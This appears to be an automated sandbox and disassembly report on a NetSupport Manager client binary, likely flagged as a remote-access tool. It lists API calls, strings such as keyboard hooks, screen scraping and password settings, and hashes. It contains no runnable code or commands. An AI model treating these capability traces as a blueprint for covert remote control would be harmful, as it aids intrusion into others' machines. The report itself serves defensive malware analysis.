                                                                                      • String ID: CheckLeaks$Client$Date=%04d-%02d-%02d$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$_debug$psapi.dll$
                                                                                      • API String ID: 263027137-103253431
                                                                                      • Opcode ID: 87783a789c6862cb7a583f6d0127a67f1abf74d6ca2b18a0a01f6916aa137176
                                                                                      • Instruction ID: 17d7fdf42b282dadbb05295794651177f64ab9c07d211a437ec733fd2e53fcc2
                                                                                      • Opcode Fuzzy Hash: 87783a789c6862cb7a583f6d0127a67f1abf74d6ca2b18a0a01f6916aa137176
                                                                                      • Instruction Fuzzy Hash: A3B1BFB1E242699FDB10DFE9CDC0AADFBB6EB48319F10452AE414E7348DB349844CB65

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(Wtsapi32.dll,Client,screenscrape,00000001,00000003,TCPIP,ListenPort,00000000,00000003,00000003,?,?,?,?,?,?), ref: 1102DF31
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID: $14/03/16 10:38:31 V12.10F8$405464$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                      • API String ID: 1029625771-4270881505
                                                                                      • Opcode ID: efde7a6f29c4b35a1bc2373ff856d498f8aef1b4f42035034b7e6d706e59a609
                                                                                      • Instruction ID: 8eab5b2d156e186679f92ce27f1e5cdd209b728942572a9b5b46018c3091c824
                                                                                      • Opcode Fuzzy Hash: efde7a6f29c4b35a1bc2373ff856d498f8aef1b4f42035034b7e6d706e59a609
                                                                                      • Instruction Fuzzy Hash: 97C1D275E0026AAFDF22DF959C84BEDF7B9AB44308F9440EDE55867280D770AE80CB51

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(User32.dll,00000000,00000000), ref: 111414F3
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 11141563
                                                                                      • LoadLibraryA.KERNEL32(imm32,?,?,00000000,00000000), ref: 11141586
                                                                                      • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 111415E5
                                                                                      • _memset.LIBCMT ref: 111415F9
                                                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 11141649
                                                                                      • GetStockObject.GDI32(00000000), ref: 11141653
                                                                                      • RegisterClassExA.USER32(?), ref: 1114166A
                                                                                      • LoadLibraryA.KERNEL32(pcihooks,?,?,00000000,00000000), ref: 11141702
                                                                                      • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 11141717
                                                                                      • SetTimer.USER32(00000000,00000000,000003E8,1113CD60), ref: 1114183A
                                                                                      • #17.COMCTL32(?,?,?,00000000,00000000), ref: 11141868
                                                                                      • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000000,00000000), ref: 11141873
                                                                                        • Part of subcall function 11017450: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,4012B9B4,1102FCB2,00000000), ref: 1101747E
                                                                                        • Part of subcall function 11017450: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1101748E
                                                                                        • Part of subcall function 11017450: GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 110174D2
                                                                                        • Part of subcall function 11017450: FreeLibrary.KERNEL32(00000000), ref: 110174F8
                                                                                        • Part of subcall function 110CC7F0: CreateWindowExA.USER32(00000000,button,11194244,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000000,00000000), ref: 110CC829
                                                                                        • Part of subcall function 110CC7F0: SetClassLongA.USER32(00000000,000000E8,110CC570), ref: 110CC840
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Library$Load$Class$AddressCreateFreeProc$CursorEventInfoLongObjectRegisterStockTimerWindow_memset
                                                                                      • String ID: *quiet$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll
                                                                                      • API String ID: 3706574701-3145203681
                                                                                      • Opcode ID: bf77d67e3ec3500b8f2db5927d4705f1cc154319e5a682cee20025d48f6291c1
                                                                                      • Instruction ID: 9b294397b9efa9119a6c3372e39ca87a41eafe2d9b680e3b49ce131b24699399
                                                                                      • Opcode Fuzzy Hash: bf77d67e3ec3500b8f2db5927d4705f1cc154319e5a682cee20025d48f6291c1
                                                                                      • Instruction Fuzzy Hash: 6EA19DB4E0126AAFDB01DFE9C9C4AADFBB4FB4870DB60413EE52997644EB306440CB55

                                                                                      Control-flow Graph

APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,6D121370,?,0000001A), ref: 110286DD
• _strrchr.LIBCMT ref: 110286EC
  • Part of subcall function 111646CE: __stricmp_l.LIBCMT ref: 1116470B
Strings
Memory Dump Source
• Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: FileModuleName__stricmp_l_strrchr
• String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
• API String ID: 1609618855-357498123
• Opcode ID: f758b9b815b32a629a166d271db5dcc578b7f2649effa84e62f149b16d96c17d
• Instruction ID: efd952e0d0f75bab71a6f775fe147756553f35749af42d5d105ea8c6321280ff
• Opcode Fuzzy Hash: f758b9b815b32a629a166d271db5dcc578b7f2649effa84e62f149b16d96c17d
• Instruction Fuzzy Hash: ED12D67CD0929A8BDB17CF64CC807E5B7F5AB19308F8400EEE9D557201EB729686CB52

Control-flow Graph (graph image not reproduced)
APIs
• LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 1108678C
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 110867AA
• LoadLibraryA.KERNEL32(?), ref: 110867EC
• GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11086807
• GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 1108681C
• GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 1108682D
• GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 1108683E
• GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 1108684F
• GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 11086860
Strings
Memory Dump Source
• Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad$FileModuleName
• String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
• API String ID: 2201880244-3035937465
• Opcode ID: 4b4bd3f155fc2ea4308a314feeb32441d96d80ab178d9e56264d575cdcc26986
• Instruction ID: c81deb3771c39ade44f8803fbe1e6421c41fb3d40bd553f41274565aeadcb2b4
• Opcode Fuzzy Hash: 4b4bd3f155fc2ea4308a314feeb32441d96d80ab178d9e56264d575cdcc26986
• Instruction Fuzzy Hash: CD51C174E1834A9BD710DF79DC94BA6FBE9AF54304B1289AED885C7240EAB2E444CF50

Control-flow Graph (graph image not reproduced)
APIs
• RegCloseKey.ADVAPI32(00000000), ref: 1114194A
Strings
Memory Dump Source
• Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: Close
• String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$
• API String ID: 3535843008-4208778996
• Opcode ID: 4154c40c43665f62878aea5254195e6e6e08202dfc88ecc93f42b5d3f19d5548
• Instruction ID: 6553b1da6d6d14651d2a1fffef45e08f8fb4271012d2e4188a9b1e9169dedbc2
• Opcode Fuzzy Hash: 4154c40c43665f62878aea5254195e6e6e08202dfc88ecc93f42b5d3f19d5548
• Instruction Fuzzy Hash: E4420778E002999FEB21CBA0CD90FEEF7766F95B08F1401D8D50967681EB727A84CB51

Control-flow Graph (graph image not reproduced)
APIs
  • Part of subcall function 111450A0: GetVersionExA.KERNEL32(111F0EF0,75BF8400), ref: 111450D0
  • Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
  • Part of subcall function 111450A0: _memset.LIBCMT ref: 1114512D
  • Part of subcall function 111450A0: _strncpy.LIBCMT ref: 111451FA
• PostMessageA.USER32(0002046E,000006CF,00000007,00000000), ref: 11138E0F
  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
• SetWindowTextA.USER32(0002046E,00000000), ref: 11138EB7
• IsWindowVisible.USER32(0002046E), ref: 11138F7C
• GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000), ref: 11138F9C
• IsWindowVisible.USER32(0002046E), ref: 11138FAA
• SetForegroundWindow.USER32(00000000), ref: 11138FD8
• EnableWindow.USER32(0002046E,00000001), ref: 11138FE7
• IsWindowVisible.USER32(0002046E), ref: 11139038
• IsWindowVisible.USER32(0002046E), ref: 11139045
• EnableWindow.USER32(0002046E,00000000), ref: 11139059
• EnableWindow.USER32(0002046E,00000000), ref: 11138FBF
  • Part of subcall function 11131210: ShowWindow.USER32(0002046E,00000000,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131234
• EnableWindow.USER32(0002046E,00000001), ref: 1113906D
Strings
Memory Dump Source
• Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
• String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText$
• API String ID: 3453649892-2635238298
• Opcode ID: 391fd03a16533da79435ce5bee1303fc2e717428408a6b437c143b59ca9afbf1
• Instruction ID: ae8ec3c714d324370739ddb1cab1952d607c59122f5be0bb7ac7fd02d25128b2
• Opcode Fuzzy Hash: 391fd03a16533da79435ce5bee1303fc2e717428408a6b437c143b59ca9afbf1
• Instruction Fuzzy Hash: 86C12A75A1122A9BEB11DFF4CD80B6EF769ABC072DF140138EA159B28CEB75E804C751

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • InitializeCriticalSection.KERNEL32(0000000C,?,00000000), ref: 11074AE5
                                                                                      • InitializeCriticalSection.KERNEL32(00000024,?,00000000), ref: 11074AEB
                                                                                      • InitializeCriticalSection.KERNEL32(0000003C,?,00000000), ref: 11074AF1
                                                                                      • InitializeCriticalSection.KERNEL32(0000DB1C,?,00000000), ref: 11074AFA
                                                                                      • InitializeCriticalSection.KERNEL32(00000054,?,00000000), ref: 11074B00
                                                                                      • InitializeCriticalSection.KERNEL32(0000006C,?,00000000), ref: 11074B06
                                                                                      • _strncpy.LIBCMT ref: 11074B68
                                                                                      • ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,00000000), ref: 11074BCF
                                                                                      • CreateThread.KERNEL32(00000000,00004000,11070C60,00000000,00000000,?), ref: 11074C6C
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 11074C73
                                                                                      • SetTimer.USER32(00000000,00000000,000000FA,11063680), ref: 11074CB7
                                                                                      • std::exception::exception.LIBCMT ref: 11074D68
                                                                                      • __CxxThrowException@8.LIBCMT ref: 11074D83
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalInitializeSection$CloseCreateEnvironmentException@8ExpandHandleStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
                                                                                      • String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
                                                                                      • API String ID: 703120326-1497550179
                                                                                      • Opcode ID: 7c8943816f378bc6fd854347406ceee894156ad89ebdfca9a8c75f1e5f5be459
                                                                                      • Instruction ID: 2d3153b5a6430d98d64e81d2a1e668bfe4de0d121a1dff3557e595bbadcf65c6
                                                                                      • Opcode Fuzzy Hash: 7c8943816f378bc6fd854347406ceee894156ad89ebdfca9a8c75f1e5f5be459
                                                                                      • Instruction Fuzzy Hash: 79B1A4B5A00359AFD710CF64CD84FDAF7F4BB48708F0085A9E65997281EBB0B944CB65

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11108E0A
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 11108E19
                                                                                      • GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11108E2B
                                                                                      • LoadLibraryA.KERNEL32(?), ref: 11108E61
                                                                                      • GetProcAddress.KERNEL32(?,GrabKM), ref: 11108E8E
                                                                                      • GetProcAddress.KERNEL32(?,LoggedOn), ref: 11108EA6
                                                                                      • FreeLibrary.KERNEL32(?), ref: 11108ECB
                                                                                        • Part of subcall function 1110F2B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,11110245,1110FDE0,00000001,00000000), ref: 1110F2C7
                                                                                        • Part of subcall function 1110F2B0: CreateThread.KERNEL32(00000000,11110245,00000001,00000000,00000000,0000000C), ref: 1110F2EA
                                                                                        • Part of subcall function 1110F2B0: WaitForSingleObject.KERNEL32(?,000000FF,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F317
                                                                                        • Part of subcall function 1110F2B0: CloseHandle.KERNEL32(?,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F321
                                                                                      • GetStockObject.GDI32(0000000D), ref: 11108EDF
                                                                                      • GetObjectA.GDI32(00000000,0000003C,?), ref: 11108EEF
                                                                                      • InitializeCriticalSection.KERNEL32(0000003C), ref: 11108F0B
                                                                                      • InitializeCriticalSection.KERNEL32(111F060C), ref: 11108F16
                                                                                        • Part of subcall function 11107290: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11189A56,000000FF), ref: 11107363
                                                                                        • Part of subcall function 11107290: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111073B2
                                                                                      • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108F59
                                                                                        • Part of subcall function 1109E9E0: GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA01
                                                                                        • Part of subcall function 1109E9E0: OpenProcessToken.ADVAPI32(00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA08
                                                                                        • Part of subcall function 1109E9E0: CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1109EA27
                                                                                      • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108FAA
                                                                                      • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108FFF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandle$Library$LoadObject$AddressCreateCriticalEventInitializeOpenProcProcessSection$CurrentDirectoryFreeSingleStockSystemThreadTokenWait_malloc_memsetwsprintf
                                                                                      • String ID: GrabKM$LPT1$LoggedOn$\pcigina$nsm_gina_sas
                                                                                      • API String ID: 3930710499-403456261
                                                                                      • Opcode ID: 1bb63630e84e06d7a5d883501c08249baca6a639cf459e52fb6089e18ee58e4a
                                                                                      • Instruction ID: 229803012459fbbe5cfd3a30b02a894d1af5bad55287ed163187595495ff030c
                                                                                      • Opcode Fuzzy Hash: 1bb63630e84e06d7a5d883501c08249baca6a639cf459e52fb6089e18ee58e4a
                                                                                      • Instruction Fuzzy Hash: DC81AFB4E0435AEFEB55DFB48C89B9AFBE9AB48308F00457DE569D7280E7309944CB11
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000102,NSM.LIC,00000009), ref: 110281F1
                                                                                        • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                      • wsprintfA.USER32 ref: 11028214
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11028259
                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 1102826D
                                                                                      • wsprintfA.USER32 ref: 11028291
                                                                                      • CloseHandle.KERNEL32(?), ref: 110282A7
                                                                                      • CloseHandle.KERNEL32(?), ref: 110282B0
                                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,?,?,?,NSM.LIC,00000009), ref: 11028311
                                                                                      • GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,?,?,NSM.LIC,00000009), ref: 11028325
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
                                                                                      • String ID: "$Locales\%d\$NSM.LIC$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
                                                                                      • API String ID: 512045693-419896573
                                                                                      • Opcode ID: be2a4d539e06a764388bcf1fddbdd407ba59922a3a30c161602edf8e7ebb4000
                                                                                      • Instruction ID: 7a246749baaa4a6e23861a3fd22e5cd13303056935123195fcb9bb693944541c
                                                                                      • Opcode Fuzzy Hash: be2a4d539e06a764388bcf1fddbdd407ba59922a3a30c161602edf8e7ebb4000
                                                                                      • Instruction Fuzzy Hash: B841D678E04229ABD714CF65CCD5FEAB7B9EB44709F0081A5F95897280DA71AE44CBA0
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(PCIINV.DLL,4012B9B4,03006E50,03006E40,?,00000000,1118276C,000000FF,?,11031942,03006E50,00000000,?,?,?), ref: 11085E45
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                        • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                      • GetProcAddress.KERNEL32(00000000,GetInventory), ref: 11085E6B
                                                                                      • GetProcAddress.KERNEL32(00000000,Cancel), ref: 11085E7F
                                                                                      • GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11085E93
                                                                                      • wsprintfA.USER32 ref: 11085F1B
                                                                                      • wsprintfA.USER32 ref: 11085F32
                                                                                      • wsprintfA.USER32 ref: 11085F49
                                                                                      • CloseHandle.KERNEL32(00000000,11085C70,00000001,00000000), ref: 1108609A
                                                                                        • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,74DEF550,?,?,110860C0,?,11031942,03006E50,00000000,?,?,?), ref: 11085A98
                                                                                        • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,74DEF550,?,?,110860C0,?,11031942,03006E50,00000000,?,?,?), ref: 11085AAB
                                                                                        • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,74DEF550,?,?,110860C0,?,11031942,03006E50,00000000,?,?,?), ref: 11085ABE
                                                                                        • Part of subcall function 11085A80: FreeLibrary.KERNEL32(00000000,74DEF550,?,?,110860C0,?,11031942,03006E50,00000000,?,?,?), ref: 11085AD1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
                                                                                      • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                                      • API String ID: 4263811268-2492245516
                                                                                      • Opcode ID: f5aef0daa14bc6ea66726438fc532167d4c8a127bd90decb683372eff0d319c6
